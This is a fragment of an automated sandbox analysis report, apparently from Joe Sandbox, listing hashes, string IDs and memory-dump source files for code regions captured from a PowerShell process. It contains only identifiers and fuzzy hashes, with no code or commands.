                            • String ID: 4'oq$4'oq$tPoq$tPoq$$oq$$oq$$oq$$oq
                            • API String ID: 0-3975157449
                            • Opcode ID: 997ea8a6de8ddf28f2af0e215cf6c06ee637c3c142ad689aed699842e03b20b5
                            • Instruction ID: 767140eed77e64dfd6327717fe61bbbe66420c31908e35ecb2c0b319274762e9
                            • Opcode Fuzzy Hash: 997ea8a6de8ddf28f2af0e215cf6c06ee637c3c142ad689aed699842e03b20b5
                            • Instruction Fuzzy Hash: 36A148F1704219AFEB258B6D88026A6BBBAEFC6710F18807BD449CB391DA35CC45C761
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'oq$4'oq$tPoq$tPoq$$oq$$oq$$oq
                            • API String ID: 0-1157588631
                            • Opcode ID: db6ddba6878a82ed1e72d191b2e33330c33ba00df26868860c3baaed30fce171
                            • Instruction ID: 55d4f7a905c2c629469ea0f73aae96c904067baa7eace6e3e0cb65a66ba23386
                            • Opcode Fuzzy Hash: db6ddba6878a82ed1e72d191b2e33330c33ba00df26868860c3baaed30fce171
                            • Instruction Fuzzy Hash: A9A181F1704206AFEB184B7988026BABBA9DFC5314F14807BD549DB791EB36CC45CBA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'oq$4'oq$4'oq$4'oq$$oq$$oq
                            • API String ID: 0-4161645286
                            • Opcode ID: 3cf164685aa81bf4bcbdcce62020d16917bd142e8f7c562a247ae847d57cdf46
                            • Instruction ID: e0cbc6662c6c98d5e4ca6b8d1f72b3ea0697d0b365ad2c512c1943ccbb9df20d
                            • Opcode Fuzzy Hash: 3cf164685aa81bf4bcbdcce62020d16917bd142e8f7c562a247ae847d57cdf46
                            • Instruction Fuzzy Hash: C1113DA1B0934B7FEB2E162D24231BB5FABAFC365072900ABC445DB7C6DF158C464792
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'oq$4'oq$$oq$$oq$$oq
                            • API String ID: 0-3619957949
                            • Opcode ID: c27e7ad8841dd566a27de1e0ca35c2dbee77b780b6d07eba9f554d3200e2000d
                            • Instruction ID: 3bb2bae787fa890af51d0e4774a459c7eeeba8c881df7825fef6d0497c5ce1dd
                            • Opcode Fuzzy Hash: c27e7ad8841dd566a27de1e0ca35c2dbee77b780b6d07eba9f554d3200e2000d
                            • Instruction Fuzzy Hash: BD5109F1B1420EEFEB245A6984027ABBBB6EBC6311F14807BD549CB681DA35C841C791
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $oq$$oq$$oq$$oq
                            • API String ID: 0-1177147994
                            • Opcode ID: 0259bfe109d973c0c11c820db0ec89b16b34cadc880cd8f6312b153529566fc4
                            • Instruction ID: 0dd3715c56f5a5f625d5902e21cd78a3a8520e0ca92050cdd2a7d5baa7f1ac27
                            • Opcode Fuzzy Hash: 0259bfe109d973c0c11c820db0ec89b16b34cadc880cd8f6312b153529566fc4
                            • Instruction Fuzzy Hash: 722147F1B0820ABBFB345A2A8802727AA9BDBC5714F24843A950DCB7C1DE77C8408361